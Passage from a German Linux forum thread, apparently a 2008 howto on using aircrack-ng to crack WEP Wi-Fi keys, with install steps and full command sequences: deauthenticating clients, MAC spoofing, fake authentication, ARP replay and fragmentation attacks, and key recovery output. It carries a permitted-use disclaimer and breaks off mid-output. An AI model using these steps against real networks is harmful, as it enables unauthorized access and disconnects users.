zyrusthc-linux.no-ip.org

A Linux Fan Page .... Shellscripts , Mohaa - Cod2 - Battlefield2 - CS - CSS - ET Webinterface ......

Logo zyrusthc-linux.no-ip.org
Freitag, 14. August 2020
  • Benutzer

  • Besucher
    Heute:
    58
    Gestern:
    98
    Gesamt:
    333.644
  • Benutzer & Gäste
    3668 Benutzer registriert, davon online: 63 Gäste
 
Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
1932 Beiträge & 333 Themen in 13 Foren
Keine neuen Beiträge, seit Ihrem letzten Besuch am 14.08.2020 - 18:07.
  Login speichern
Forenübersicht » Linux » Howto + Tips und Tricks » aircrack-ng Linux Howto

vorheriges Thema   nächstes Thema  
7 Beiträge in diesem Thema (offen) Seiten (1): (1)
Autor
Beitrag
Zyrusthc ist offline Zyrusthc  
Themenicon    aircrack-ng Linux Howto
Administrator
712 Beiträge - Alter Hase
Zyrusthc`s alternatives Ego

Aircrack-ng Linux Howto



Das abkopieren und posten des Howto`s in anderen Foren und Internetpräsenzen ist untersagt!
Lediglich verlinken ist erlaubt!


  • 1. Einleitung
  • 2. Hardware & Treiber
  • 3. aircrack-ng und aircrack-ptw installieren
  • 4. WEP Open Authentication
  • 5. WEP Shared Key Authentication
  • 6. WPA/WPA2
  • 7. Links



1. Einleitung

Diese Einleitung ist aus Wikipedia zitiert, weil es sich eigentlich besser nicht erklären lässt.
http://de.wikipedia.org/wiki/Aircrack

In diesem Howto möchte ich euch den Einsatz von aircrack_ng beschreiben.

Das Programm Aircrack schneidet gesendete Datenpakete mit und analysiert die zu jedem WEP-Paket gehörenden 24-Bit langen Initialisierungsvektoren (IVs). Mit genügend vielen mitgeschnittenen Paketen bzw. schwachen IVs kann das Programm Aircrack auf den WEP-Schlüssel schließen.
Dabei handelt es sich im Wesentlichen um einen statistisch-mathematischen Angriff, d. h. theoretisch ist es möglich, mit genügend vielen IVs auf den WEP-Schlüssel rückzuschließen. Je nach Länge des verwendeten Schlüssels benötigt man 100.000 bis 250.000 IVs (bei 40-Bit-Schlüsseln) oder 500.000 bis 1.000.000 IVs (bei 104-Bit-Schlüsseln) oder auch viel mehr.

Seit Version 0.8 konnte die Paketanzahl dank der PTW-Attacke der Technischen Universität Darmstadt auf einen Bruchteil reduziert werden. Nun reicht beispielsweise eine Anzahl von 50.000 Paketen für eine 50-%-Chance einen 128-Bit-Schlüssel zu errechnen. Natürlich steigert dies auch die Chancen dramatisch für einen 64-Bit-Schlüssel. Der Erfolg ist nicht garantiert und hängt u. a. von einer Vielzahl weiterer Faktoren ab.

Mittlerweile implementiert Aircrack moderne Angriffe wie den KoreK-Angriff. Des Weiteren kann der Angriff um aktive Methoden ergänzt werden, um schneller eine große Zahl an Paketen mitschneiden zu können. Auf diese Weise kann in ein per WEP gesichertes Netzwerk innerhalb weniger Minuten eingebrochen werden. Laut einer Studie der TU Darmstadt ist es Forschern gelungen ein mit 128 Bit verschlüsseltes WLAN (Schlüssellänge 104 Bit) in weniger als 60 Sekunden zu knacken. Dies wird mittels Optimierung der Klein-Attacke erreicht und PTW genannt. Die dafür geschriebene Beispielanwendung wurde zum Download angeboten und PTW in die Version 0.8 von Aircrack integriert.

Mit WPA verschlüsselte Netzwerke kann Aircrack mittels eines Wörterbuchangriff angreifen, indem es den beim Verbindungsaufbau stattfindenden Four-Way-Handshake einer WPA-Verbindung mitliest und diesen anschließend mittels Brute-Force zu entschlüsseln versucht.



Meine Distanzierung:
Ich möchte hier ausdrücklich drauf hinweisen das die hier beschreibene Szenarien nur auf eigenen Netzwerken, bzw. auf Netzwerken ausgeführt werden dürfen wo auch der Netzwerkbetreiber sein Einverständnis gegeben hat! Das unerlaubte eingreifen bzw. Hacken vom fremden Datenverarbeitungsanlagen ist Strafbar! Siehe Links --> Rechtliches!

Ich übernehme keinerlei Verantwortung für Schäden die durch dieses Howto verursacht werden!





Greeez Oli


Dieser Beitrag wurde 23 mal editiert, zuletzt von Zyrusthc am 22.11.2008 - 22:37.
Beitrag vom 16.02.2008 - 06:09
Diesen Beitrag melden   nach weiteren Posts von Zyrusthc suchen Zyrusthc`s Profil ansehen Zyrusthc eine E-Mail senden Zyrusthc eine private Nachricht senden Zyrusthc`s Homepage besuchen Zyrusthc zu Ihren Freunden hinzufügen zum Anfang der Seite
Zyrusthc ist offline Zyrusthc  
Administrator
712 Beiträge - Alter Hase
Zyrusthc`s alternatives Ego
2. Hardware & Treiber

Für den erfolgreichen Einsatz von aircrack-ng spielen mehrere Faktoren eine Rolle.
Eine Rolle spielt dabei die Hardware, also der Chipsatz eures Wireless Adapters, da aircrack-ng
nur bestimmte Treiber vollständig unterstützt.

aircrack-ng unterstützt folgende Treiber:
  • acx
  • broadcom
  • HostAP
  • ipw2200
  • ipw3945
  • madwifi-old
  • madwifi-ng
  • prism54
  • r 8180-sa2400
  • r8187
  • rt2500
  • rt2570
  • rt61
  • rt73
  • wlan-ng
  • zd1211rw

Nur diese Treiber unterstützen die Packet Injektion die es ermöglicht im Monitor Mode Pakete zu senden.
Einige Treiber müssen aber erst dementprechent gepatcht werden, damit der Treiber die Packet Injektion unterstützt! Die Installationsanleitungen zu den Treibern sind hierzu finden, und eine Treiber-Kompatiblitätsliste hier.

Ich habe aircrack-ng mit dem rt73 einen USB Stick von Ralink getestet der mit dem CVS Daily Treiber von Serialmonkey.com auf Anhieb funtioniert hat.

Desweiteren habe ich eine PCMCIA Karte mit Realtek 8180 Chipsatz und dem Treiber rtl8180-0.21 getestet, für den Betrieb mit Packet Injektion war aber noch das Patch rtl8180-0.21v2.patch erforderlich.

Auch meine im Laptop integrierte ipw2200bg habe ich mit dem Treiber ipw2200-1.1.4 und dem erforderlichen Patch ipw2200-1.1.4-inject.patch zum laufen gebracht.




Greeez Oli


Dieser Beitrag wurde 2 mal editiert, zuletzt von Zyrusthc am 18.02.2008 - 18:49.
Beitrag vom 16.02.2008 - 18:33
Diesen Beitrag melden   nach weiteren Posts von Zyrusthc suchen Zyrusthc`s Profil ansehen Zyrusthc eine E-Mail senden Zyrusthc eine private Nachricht senden Zyrusthc`s Homepage besuchen Zyrusthc zu Ihren Freunden hinzufügen zum Anfang der Seite
Zyrusthc ist offline Zyrusthc  
Administrator
712 Beiträge - Alter Hase
Zyrusthc`s alternatives Ego
3. aircrack-ng und aircrack-ptw installieren

Zum kompilieren von aircrack_ng muss der GNU C Compiler "gcc" installiert sein!
Als erstes laden wir uns die Datei aircrack-ng-0.9.2.tar.gz herunter, und entpacken diese:
wget http://download.aircrack-ng.org/aircrack-ng-0.9.2.tar.gz
tar xfvz aircrack-ng-0.9.2.tar.gz


Nun kompilieren und installieren wir aircrack_ng:
cd aircrack-ng-0.9.2
make
make install


Alternativ zu make install, könnt ihr auch checkinstall an dieser Stelle verwenden und euch ein RPM Packet von aircrack-ng bauen.

Wenn keine Fehler aufgetretten sind, dann wurden folgende Tools installiert:
  • /usr/local/bin/aircrack-ng
  • /usr/local/bin/airdecap-ng
  • /usr/loc al/bin/aireplay-ng
  • /usr/local/bin/airodump-ng
  • /usr/local/bin/a irtun-ng
  • /usr/local/bin/ivstools
  • /usr/local/bin/makeivs
  • /usr/lo cal/bin/kstats

Nun laden wir uns noch aircrack-ptw-1.0.0 herunter:
wget http://www.cdc.informatik.tu-darmstadt.de/aircrack...0.0.tar .gz
tar xfvz aircrack-ptw-1.0.0.tar.gz


Kompilieren:
cd aircrack-ptw-1.0.0
make


Und nach /usr/local/bin kopieren da das Makefile keine Regel zum installieren kennt:
cp aircrack-ptw /usr/local/bin

Nun steht uns auch der Befehl aircrack-ptw zur Verfügung:
  • /usr/local/bin/aircrack-ptw




Greeez Oli


Dieser Beitrag wurde 8 mal editiert, zuletzt von Zyrusthc am 17.02.2008 - 18:50.
Beitrag vom 16.02.2008 - 18:34
Diesen Beitrag melden   nach weiteren Posts von Zyrusthc suchen Zyrusthc`s Profil ansehen Zyrusthc eine E-Mail senden Zyrusthc eine private Nachricht senden Zyrusthc`s Homepage besuchen Zyrusthc zu Ihren Freunden hinzufügen zum Anfang der Seite
Zyrusthc ist offline Zyrusthc  
Administrator
712 Beiträge - Alter Hase
Zyrusthc`s alternatives Ego
4. WEP Open Authentication

Dieses Beispiel beschreibt die vorgehensweise bei einem Accesspoint mit WEP Verschlüsselung und Open Authentication:

Als erstes die vorhandenen Netzwerke mit airodump-ng ermitteln. rausb0 ist der WLAN Interfacename.
airodump-ng rausb0

Zitat
CH 8 ][ Elapsed: 1 min ][ 2008-02-16 04:07

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

11:11:11:11:11:11 -1 41 0 0 10 54. WEP WEP OPN WLAN
22:22:22:22:22:22 -1 41 258 0 7 54 WPA CCMP PSK <length: 0>

BSSID STATION PWR Lost Packets Probes

11:11:11:11:11:11 00:11:22:33:44:55 -1 1 9
22:22:22:22:22:22 33:33:33:33:33:33 -1 0 259


Abbrechen wieder mit STRG+C

Wir interessieren uns für den Accesspoint mit der Essid WLAN und der MAC Adresse "11:11:11:11:11:11" auf Kanal 10. Jetzt lassen wir uns den verschlüsselten dump von Kanal 10 und der bssid "11:11:11:11:11:11" nach out schreiben

airodump-ng -c 10 --bssid 11:11:11:11:11:11 -w out rausb0

Zitat
CH 10 ][ Elapsed: 1 min ][ 2008-02-16 04:07

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

11:11:11:11:11:11 -1 41 0 0 10 54. WEP WEP OPN WLAN

BSSID STATION PWR Lost Packets Probes

11:11:11:11:11:11 00:11:22:33:44:55 -1 1 9


Kurze Erklärung:
  • -c 10 auf Kanal 10 hören
  • --bssid 11:11:11:11:11:11 nur die Bssid 11:11:11:11:11:11 abhören
  • -w out Die Ausgabe in die Datei out-0X schreibe, X wird bei erneuten Start 1-2-3 usw.
  • rausb0 Das WLAN Interface

Wie wir sehen ist gerade ein Client mit der MAC Adresse "00:11:22:33:44:55" mit dem Accespoint "11:11:11:11:11:11" verbunden.

Jetzt öffnen wir erst einmal ein weiteres Terminal.


Im nächsten Schritt senden wir ein Authentication Request und dann eine Association Request zum Accespoint. Dafür kommt aireplay-ng zu Einsatz.

aireplay-ng -1 0 -e WLAN -a 11:11:11:11:11:11 -h 00:11:22:33:44:55 rausb0

Zitat
The interface MAC (xx:xx:xx:xx:xx:xx) doesn't match the specified MAC (-h).
ifconfig rausb0 hw ether 00:11:22:33:44:55
20:15:57 Waiting for beacon frame (BSSID: 11:11:11:11:11:11)
20:15:57 Sending Authentication Request
20:15:57 Authentication successful
20:15:57 Sending Association Request
20:15:57 Association successful :-)


Kurze Erklärung:
  • -1 0 Eine "fake authentication" Attacke senden, 0 steht für die Verzögerung, bei manchen AP`s ist 20 eine sinnvolle Einstellung.
  • -e WLAN Die essid des Accesspoints.
  • -a 11:11:11:11:11:11 Die bssid des Accespoints.
  • -h 00:11:22:33:44:55 Die MAC Adresse des Clients.
  • rausb0 Das WLAN Interface

Ist das erfolgreich dann können wir nun Traffic mit aireplay-ng und einer ARP-request replay Attacke erzeugen:
aireplay-ng -3 -b 11:11:11:11:11:11 -h 00:11:22:33:44:55 -x 600 rausb0

Zitat
The interface MAC (xx:xx:xx:xx:xx:xx) doesn't match the specified MAC (-h).
ifconfig rausb0 hw ether 00:11:22:33:44:55
Saving ARP requests in replay_arp-0213-201520.cap
You should also start airodump-ng to capture replies.
Read 201268 packets (got 98575 ARP requests), sent 100374 packets...(421 pps)


Kurze Erklärung:
  • -3 Steht für die ARP-request Attacke.
  • -x 600 Legt die Anzahl der Packete pro Sekunde fest.

Nun sollten Packete gesendet werden, wenn dies aus irgenteinen Grund abbricht müsst ihr erneut den vorigen Befehl ausführen, und am Accesspoint eine Association durchführen.

Im ersten Terminalfenster wo airodump-ng läuft sollten bei Data die Pakete jetzt durchrattern, während der letzte Befehl im 2. Terminal die Pakete sendet.

Sollten keine Pakete gesendet werden, dann überprüft ob die Injektion funtioniert.
aireplay-ng -9 -b 11:11:11:11:11:11 -h 00:11:22:33:44:55 rausb0

Zitat
The interface MAC (xx:xx:xx:xx:xx:xx) doesn't match the specified MAC (-h).
ifconfig rausb0 hw ether 00:11:22:33:44:55
18:49:39 Trying broadcast probe requests...
18:49:40 Injection is working!
18:49:40 Found 1 AP

18:49:40 Trying directed probe requests...
18:49:40 11:11:11:11:11:11 - channel: 10 - 'WLAN'
18:49:47 Ping (min/avg/max): 1.376ms/1.681ms/2.957ms
18:49:47 7/30: 23%


Kurze Erklärung:
  • -9 Testest ob Packet Injection funktioniert und genügent Empfangsqualität zur verfügung steht.

Sollte das erfolglos sein, dann seid ihr vielleicht zu weit weg vom Accesspoint, oder es funktioniert mit diesem AP nicht. Der Erfolg ist halt nicht garantiert!

Je nach Schlüssellänge müssen wir genügent IVs sammeln. In meinen Test habe ich im Router einen 64Bit Schlüssel angelegt. Jetzt können wir aircrack-ng auf unser out File loslassen, in das airodump-ng den Mitschnitt schreibt.

Öffnen wir zunächst ein 3. Terminal.

aircrack-ng -e WLAN out-0*.cap

Zitat
Aircrack-ng 0.9.2


[00:00:00] Tested 1 keys (got 210603 IVs)

KB depth byte(vote)
0 0/ 1 62( 57) D2( 17) 43( 15) 6A( 15) 18( 12) 33( 5) 38( 5) 52( 5) 7D( 5) 89( 4) 0D( 3) 35( 3) 9C( 3) FA( 3) 07( 0) 09( 0) 13( 0)
1 0/ 1 6C( 87) 25( 13) 6D( 13) CA( 13) A6( 8) CD( 5) 94( 4) E8( 4) CB( 3) 04( 0) 06( 0) 0C( 0) 10( 0) 17( 0) 1D( 0) 23( 0) 27( 0)
2 0/ 1 61( 29) 24( 12) 9B( 12) 5D( 8) B4( 6) 59( 5) BE( 5) C9( 5) FC( 5) 35( 3) 4E( 3) 5E( 3) 75( 3) 0A( 0) 11( 0) 12( 0) 18( 0)
3 0/ 1 62( 50) 0E( 18) 6A( 12) 38( 5) 3F( 5) 45( 5) 4F( 5) 72( 5) 67( 4) B2( 4) E9( 4) 14( 3) 4B( 3) 4D( 3) CE( 3) F5( 3) 03( 0)

KEY FOUND! [ 62:6C:61:62:6C ] (ASCII: blabl )
Decrypted correctly: 100%


Kurze Erklärung:
  • -e WLAN Gibt wieder die essid des Accesspoints an.
  • out-0*.cap Gibt die Capture Datei/en an die airodump-ng geschreiben hat.


Sollten noch nicht genügent IVs gesammelt wurden sein, dann könnt ihr mit STRG+C abbrechen. Wurden dann genug IVs gesammelt sollte aircrack-ng den Schlüssel in Sekunden berechnen können.

Ihr könnt auch aircrack-ng den Parameter "-z" mitgeben, dann wird die neue PTW WEP-Cracking Methode verwendet. Aber dies ist nur effektiv bei Schlüsseln mit 40 oder 104 bit Schlüssellänge. Ist aber dafür wesentlich schneller und CPU schonender.
Die PTW-Methode funktioniert nur erfolgreich mit arp request/reply-Paketen.
Daher dürft ihr nicht die "--ivs" Option bei airodump-ng benutzen!

Wenn Ihr nicht mit der "-z" Option arbeitet, dann wird die FMS / Korek-Methode angewendet um den WEP-Schlüssel zu kacken. Dazu müssen etwa 250000 IVs für einen 64-Bit und 1500000 IVs für einen 128bit-Schlüssel gesammelt werden. Das sind aber ungefähre Werte, wie viele IVs man tatsächlich braucht ist Variable.

Tips zur Fehlersuche bei aircrack-ng
Manchmal muss man verschiedene Techniken versuchen, um den WEP-Schlüssel zu knacken. Oft muss man auch den Parameter "-n" benutzen, um die verschiedenen Schlüssellängen zu definieren. Man kann auch den Parameter "-f" versuchen, um verschiedene Faktoren pfuschen. Mit "-k" kann man Berichtigungsmethoden deaktivieren.

Alternativ zu aircrack-ng könnt ihr natürlich auch aircrack-ptw dafür verwenden, hier gilt das selbe wie bei aircrack-ng mit dem Parameter "-z":
aircrack-ptw out-01.cap

Leider kann man aircrack-ptw nur eine .cap Datei mitgeben.

Alternative Lösung


Es gibt einen netten Trick, mit dem Du bequem WEP knacken kannst, ohne einen Client.
Grundsätzlich gehen kleine Päckchen von den Access-Point aus , diese wandelt er in ein Broadcast-Paket, so dass der Access Point eine neue IV erzeugt.

Wenn Du diesen Trick benutzt , darfst Du nicht mit der "-z" PTW Methode Option arbeiten!
Warum? Dies liegt daran, dass die PTW-Methode eine arp Anfrage/Antwort erfordert, die dieser Trick nicht generiert.

Jetzt werden sich einige fragen warum diese Technik nicht gleich beim Start aufgeführt wird?!
Der Grund dafür ist, das bei dieser Technik unabhängig von Größe rebroadcasts Päckchen erhalten werden.

Wenn Du also ein 1000-Byte-Paket empfangst, dann sendest Du auch 1000 Bytes als "Rebroadcast" Antwort. Dies bremst potenziell die Pakete pro Sekunde-Rate erheblich.
Doch auf der Seite eine gute Nachricht, es ist einfach und leicht zu bedienen. Vielleicht hast Du auch Glück, und bekommst ein sehr kleines Päckchen für die das rebroadcasting.
In diesem Fall ist die Performance vergleichbar mit der oben beschriebenen Lösung.

Für diese Schritte muss zuvor eine auch eine erfolgreiche Authentifizierung mittels fakeauth Attacke ausgeführt werden!

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 11:11:11:11:11:11 -h 00:11:22:33:44:55 rausb0

Kurze Erklärung:
  • -2 Benutze "interactive frame selection" Attacke.
  • -p 0841 legt das Frame Control Feld fest, So dass das Paket sieht wie es gesendet wird von einem WLAN-Client.
  • -c FF:FF:FF:FF:FF:FF legt die "destination MAC Addresse" für den broadcast fest. Dies ist erforderlich, um die Herkunft des AP Replay Paket zu bekommen und damit die neuen IVs zu bekommen.
  • -b 11:11:11:11:11:11 ist die Access Point MAC Addresse.
  • -h 00:11:22:33:44:55 ist die MAC Adresse, deiner Karte. Die selbe wie bei der fakeauth Attacke benutzt wurde.
  • rausb0 Das WLAN Interface


Ausgabe:
Zitat
Read 698 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

BSSID = 11:11:11:11:11:11
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:11:22:33:44:55

0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c a0f4 2000 0000 e233 962a ....4... ....3.*
0x0020: 90b5 fe67 41e0 9dd5 7271 b8ed ed23 8eda ...gA...rq...#..
0x0030: ef55 d7b0 a56f bc16 355f 8986 a7ab d495 .U...o..5_......
0x0040: 1daa a308 6a70 4465 9fa6 5467 d588 c10c ....jpDe..Tg....
0x0050: f043 09f6 5418 .C..T.

Use this packet ? y


"y" eingeben und Enter drücken und die Injektion mit diesen Packet zu starten.
Zitat
Saving chosen packet in replay_src-0411-145110.cap

Sent 10204 packets...(455 pps)


Fals airodump-ng nicht im 1.Terminal läuft, dann starte dieses jetzt!
Wenn Du über genügend IVs verfügst, dann kannst Du aircrack-ng ohne "-z" starten und versuchen den WEP-Schlüssel zu knacken.

Eine weitere Variante des Angriffs ist die Verwendung von Paketen die früher erfasst worden.
Dort müssen vollständigen Pakete mitgeschnitten werden, nicht nur die IVs!

Das Kommando würde wie folgt aussehen:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 11:11:11:11:11:11 -h 00:11:22:33:44:55 -r capture-01.cap rausb0
Der Parameter "-r capture-01.cap" gibt die früher erfasste Datei an.



Greeez Oli


Dieser Beitrag wurde 33 mal editiert, zuletzt von Zyrusthc am 23.02.2008 - 16:02.
Beitrag vom 16.02.2008 - 18:37
Diesen Beitrag melden   nach weiteren Posts von Zyrusthc suchen Zyrusthc`s Profil ansehen Zyrusthc eine E-Mail senden Zyrusthc eine private Nachricht senden Zyrusthc`s Homepage besuchen Zyrusthc zu Ihren Freunden hinzufügen zum Anfang der Seite
Zyrusthc ist offline Zyrusthc  
Administrator
712 Beiträge - Alter Hase
Zyrusthc`s alternatives Ego
5. WEP Shared Key Authentication

Dieses Beispiel beschreibt die vorgehensweise bei einem Accesspoint mit WEP Verschlüsselung und Shared Key Authentication:

Als erstes ermitteln wir wieder die vorhandenen Netzwerke mit airodump-ng
airodump-ng rausb0

Zitat
CH 8 ][ Elapsed: 1 min ][ 2008-02-16 04:07

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

11:11:11:11:11:11 -1 41 0 0 10 54. WEP WEP SKA WLAN
22:22:22:22:22:22 -1 41 258 0 7 54 WPA CCMP PSK <length: 0>

BSSID STATION PWR Lost Packets Probes

11:11:11:11:11:11 00:11:22:33:44:55 -1 1 9
22:22:22:22:22:22 33:33:33:33:33:33 -1 0 259


Abbrechen wieder mit STRG+C

Wir interessieren uns wieder für den Accesspoint mit der Essid WLAN und der MAC Adresse "11:11:11:11:11:11" auf Kanal 10. Jetzt lassen wir uns den verschlüsselten dump von Kanal 10 und der bssid "11:11:11:11:11:11" nach out schreiben
airodump-ng -c 10 --bssid 11:11:11:11:11:11 -w out rausb0

Zitat
CH 10 ][ Elapsed: 1 min ][ 2008-02-16 04:07

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

11:11:11:11:11:11 -1 41 0 0 10 54. WEP WEP SKA WLAN

BSSID STATION PWR Lost Packets Probes

11:11:11:11:11:11 00:11:22:33:44:55 -1 1 9


Kurze Erklärung:
  • -c 10 auf Kanal 10 hören
  • --bssid 11:11:11:11:11:11 nur die Bssid 11:11:11:11:11:11 abhören
  • -w out Die Ausgabe in die Datei out-0X schreibe, X wird bei erneuten Start 1-2-3 usw.
  • rausb0 Das WLAN Interface

Wie wir sehen ist gerade ein Client mit der MAC Adresse "00:11:22:33:44:55" mit dem Accespoint "11:11:11:11:11:11" verbunden.

Jetzt öffnen wir erst einmal ein weiteres Terminal.

Da oft auch ein MAC Filter aktiv ist, ist es empfehlenswert seiner WLAN-NIC diese MAC zu verpassen. Dies kann man mit folgenden Befehl erledigen:
ifconfig rausb0 hw ether 00:11:22:33:44:55

Im nächsten Schritt senden wir eine einzige Deauth Attacke an den Accespoint. Dort kommt aireplay-ng zu Einsatz. Damit bekommt der verbundene Client einen deauth.
aireplay-ng -0 1 -a 11:11:11:11:11:11 -c 00:11:22:33:44:55 rausb0

Zitat
02:11:18 Sending DeAuth to station -- STMAC: [00:11:22:33:44:55]


Kurze Erklärung:
  • -0 1 Einzelne deauth Attacke senden
  • -a 11:11:11:11:11:11 an diese Bssid senden.
  • -c 00:11:22:33:44:55 ClientMAC.
  • rausb0 Das WLAN Interface.

Jetzt sollten von airodump-ng folgende Dateien erstellt worden sein:
ls -l out-01*

Zitat
-rw-r--r-- 1 root root 144 Feb 16 02:12 out-11-11-11-11-11-11-11.xor
-rw-r--r-- 1 root root 1151768 Feb 16 02:13 out-01.cap
-rw-r--r-- 1 root root 572 Feb 16 02:13 out-01.txt


Die .xor Datei enthällt die PRGA xor bits die Du zum abschliessen der Fake Authentication brauchst.

Solltest du keine .xor Datei haben wiederhole den deauth Befehl!
Ist die Datei vorhanden dann können wir eine fakeauth Attacke senden.
Jetzt wird erst eine Authentication Anfrage gesendet und danach die Association.

aireplay-ng -1 0 -e WLAN -y out-11-11-11-11-11-11-11.xor -a 11:11:11:11:11:11 -h 00:11:22:33:44:55 rausb0
Zitat
The interface MAC (xx:xx:xx:xx:xx:xx) doesn't match the specified MAC (-h).
ifconfig rausb0 hw ether 00:11:22:33:44:55
02:18:52 Waiting for beacon frame (BSSID: 11:11:11:11:11:11)
02:18:52 Sending Authentication Request
02:18:52 AP rejects open-system authentication
02:18:54 Part1: Authentication
02:18:54 Code 0 - Authentication SUCCESSFUL :)
02:18:54 Part2: Association
02:18:54 Waiting for beacon frame (BSSID: 11:11:11:11:11:11)
02:18:54 Code 0 - Association SUCCESSFUL :)


Kurze Erklärung:
  • -1 0 fakeauth Attacke senden
  • -e WLAN Die Essid WLAN verwenden.
  • -a 11:11:11:11:11:11 Diese Bssid verwenden.
  • -y out-11-11-11-11-11-11-11.xor Diese PRGA Keystream Datei verwenden.
  • -h 00:11:22:33:44:55 ClientMAC .
  • rausb0 Das WLAN Interface.


Man kann jetzt zwar mit aireplay-ng -3 ... auf ein arp Packet warten, aber wir beginnen mit dem erstellen eines arp Packets mittels "-5".

Diese beiden Methoden erstellen ein .xor Paket das du mit packetforge-ng zu einem arp-request bauen kannst.

aireplay-ng -5 -b 11:11:11:11:11:11 -h 00:11:22:33:44:55 rausb0

Zitat
The interface MAC (xx:xx:xx:xx:xx:xx) doesn't match the specified MAC (-h).
ifconfig rausb0 hw ether 00:11:22:33:44:55
02:28:14 Waiting for a data packet...
Read 304 packets...

Size: 321, FromDS: 1, ToDS: 0 (WEP)

BSSID = 11:11:11:11:11:11
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 11:11:11:11:11:11

0x0000: 0842 0000 ffff ffff ffff 00c0 49f5 07bb .B..........I...
0x0010: 00c0 49f5 07bb 80ce df00 4900 3710 964b ..I.......I.7..K
0x0020: b5fc ffc7 db77 fc0a a09b 9e60 5a10 8925 .....w.....`Z..%
0x0030: 93a3 88ae 57f2 db61 164b cf67 6d30 ffb5 ....W..a.K.gm0..
0x0040: ec6d 9960 7686 41d3 ec37 399b 0740 889c .m.`v.A..79..@..
0x0050: 3341 f40e bd2d b33f 423d 17f9 ced3 c92b 3A...-.?B=.....+
0x0060: a58b 2514 f65a 1a5f d1a6 3ec5 2869 1026 ..%..Z._..>.(i.&
0x0070: 1136 0faa b3ce b857 60ca 77ba 2920 3d05 .6.....W`.w.) =.
0x0080: a582 2a1b 37de c9fd 62de e989 2f38 0ad8 ..*.7...b.../8..
0x0090: b5d2 8e24 f9c6 eba1 56d6 0d42 406b 66e1 ...$....V..B@kf.
0x00a0: 9866 b0f8 7caa 052d fcdb d0fd 0609 2477 .f..|..-......$w
0x00b0: b74f daa3 1532 7d91 9e77 512a e0f2 856d .O...2}..wQ*...m
0x00c0: 5f18 163e 923e f554 c0f8 b91d 2739 1ec2 _..>.>.T....'9..
0x00d0: c5dd 846e f5dc 060f f87f 2fc7 8451 7ee2 ...n...../..Q~.
--- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-0216-022831.cap
02:28:34 Data packet found!
02:28:34 Sending fragmented packet
02:28:36 No answer, repeating...
02:28:36 Trying a LLC NULL packet
02:28:36 Sending fragmented packet
02:28:36 Got RELAYED packet!!
02:28:36 Thats our LLC Null packet!
02:28:36 Trying to get 384 bytes of a keystream
02:28:38 No answer, repeating...
02:28:38 Trying to get 384 bytes of a keystream
02:28:38 Trying a LLC NULL packet
02:28:39 No answer, repeating...
02:28:39 Trying to get 384 bytes of a keystream
02:28:41 No answer, repeating...
02:28:41 Trying to get 384 bytes of a keystream
02:28:41 Trying a LLC NULL packet
02:28:41 Got RELAYED packet!!
02:28:41 Thats our LLC Null packet!
02:28:41 Trying to get 1500 bytes of a keystream
02:28:41 Got RELAYED packet!!
02:28:41 Thats our ARP packet!
Saving keystream in fragment-0216-022841.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream


Kurze Erklärung:
  • -5 Erstellt einen gültigen Keystream.
  • -b 11:11:11:11:11:11 Diese Bssid verwenden.
  • -h 00:11:22:33:44:55 ClientMAC.
  • rausb0 Das WLAN Interface.


Jetzt sollte eine .xor Datei , bsp. fragment-0216-022841.xor erzeugt worden sein.

Nun bauen wir uns mit Hilfe von packetforge-ng und der .xor Datei das arp-request:
packetforge-ng -0 -a 11:11:11:11:11:11 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0216-022841.xor -w arp-request
  • -0 ARP Packet nachmachen.
  • -a 11:11:11:11:11:11 Die bssid des Accesspoint.
  • -h 00:11:22:33:44:55 Die Client MAC.
  • -k 255.255.255.255 Ziel IP Adresse.
  • -l 255.255.255.255 Quell IP Adresse.
  • -y fragment-0216-022841.xor Die PRGA Datei.
  • -w arp-request Paket in diese PCAP Datei schreiben.


So jetzt können wir endlich mit dem erzeugten arp Packet Traffic erzeugen den airodump-ng im 1. Terminal mithört, und die begehrten IVs liefert.
aireplay-ng -2 -r arp-request rausb0

Zitat
Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 11:11:11:11:11:11
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:11:22:33:44:55

0x0000: 0841 0201 00c0 49f5 07bb 0011 2233 4455 .A....I....."3DU
0x0010: ffff ffff ffff 8001 c942 0300 9133 8987 .........B...3..
0x0020: 8d5e adb0 7059 13d2 bb83 181e 7555 cfc2 .^..pY......uU..
0x0030: cd13 0495 c8c9 df8e 68b3 30a1 5689 032e ........h.0.V...
0x0040: aaa6 9bcf ....

Use this packet ? y

Saving chosen packet in replay_src-0216-023137.cap
You should also start airodump-ng to capture replies.

Sent 9372 packets...(341 pps)


Kurze Erklärung:
  • -2 Interactive Frame selection.
  • -r arp-request Extrahiert Packete von dieser PCAP Datei.
  • rausb0 Das WLAN Interface.


Und zu guter letzt wieder ein 3.Terminal aufmachen und aircrack-ng auf die .cap Dateien loslassen.
aircrack-ng -b 11:11:11:11:11:11 *.cap

Zitat

Aircrack-ng 0.9.2


[00:00:01] Tested 1 keys (got 472273 IVs)

KB depth byte(vote)
0 0/ 1 62( 104) 09( 5) 28( 5) 23( 4) DB( 4) F0( 3) 13( 0) 2C( 0) 30( 0) 33( 0) 38( 0) 4C( 0) A0( 0) B4( 0) D1( 0) D2( 0) D5( 0)
1 0/ 1 6C( 86) CD( 15) 75( 12) 96( 12) 4E( 5) C6( 4) 8A( 3) 3A( 0) 6B( 0) 6F( 0) 83( 0) 95( 0) AD( 0) BD( 0) C2( 0) CA( 0) D2( 0)
2 0/ 1 61( 89) 23( 20) 12( 18) 25( 6) 3C( 6) FE( 5) 04( 0) 19( 0) 24( 0) 4C( 0) 51( 0) 55( 0) 59( 0) 5C( 0) 88( 0) C9( 0) DD( 0)
